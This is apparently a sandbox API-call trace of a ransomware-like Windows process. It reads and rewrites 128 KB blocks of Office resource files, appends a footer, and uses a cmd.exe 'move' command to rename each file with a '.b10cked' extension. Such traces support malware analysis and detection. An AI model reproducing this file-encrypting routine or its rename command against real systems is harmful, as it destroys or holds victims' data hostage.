[0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8e160 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.066] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x8dc78 [0158.066] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0158.077] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0158.077] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0158.077] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x8e160 [0158.077] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0158.077] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0158.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0158.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x8e160 [0158.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0158.078] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0158.078] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.090] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.090] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0158.111] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0158.111] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0158.111] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0158.111] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0158.112] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0158.112] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.153] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.154] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0158.156] SetFilePointer (in: hFile=0x114, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0158.156] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0158.156] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0158.156] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0158.157] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6e160 [0158.157] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.157] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.157] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0158.158] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6e160 [0158.158] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0158.158] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0158.159] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0158.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0158.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUB6INTL.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUB6INTL.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0158.164] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x8e160 [0158.164] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0158.164] CloseHandle (hObject=0x114) returned 1 [0158.170] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX") returned 0x3c [0158.171] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0158.172] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6IN~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUB6INTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xf5c, dwThreadId=0xe9c)) returned 1 [0158.174] CloseHandle (hObject=0x1b4) returned 1 [0158.174] CloseHandle (hObject=0x114) returned 1 [0158.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0158.174] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0158.174] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0158.174] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.174] ReleaseMutex (hMutex=0xf8) returned 1 [0158.174] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.174] ReleaseMutex (hMutex=0xf8) returned 1 [0158.174] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.174] ReleaseMutex (hMutex=0xf8) returned 1 [0158.174] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0158.175] ReleaseMutex (hMutex=0xf8) returned 1 [0158.175] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0158.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.175] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=21496452834) returned 1 [0158.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x5ab60 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0158.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x5a678 [0158.178] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0158.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0158.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0158.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x5ab60 [0158.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0158.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0158.411] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0158.422] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x5ab60 [0158.422] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0158.422] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0158.422] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.451] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.474] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0158.493] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0158.493] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0158.493] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0158.494] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0158.494] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3ab60 [0158.494] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.507] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0158.508] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0158.509] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3ab60 [0158.509] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0158.509] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0158.509] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0158.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBWZINT.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0158.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PUBWZINT.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBWZINT.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0158.513] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x5ab60 [0158.513] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0158.514] CloseHandle (hObject=0x114) returned 1 [0158.566] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX") returned 0x3c [0158.567] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0158.568] 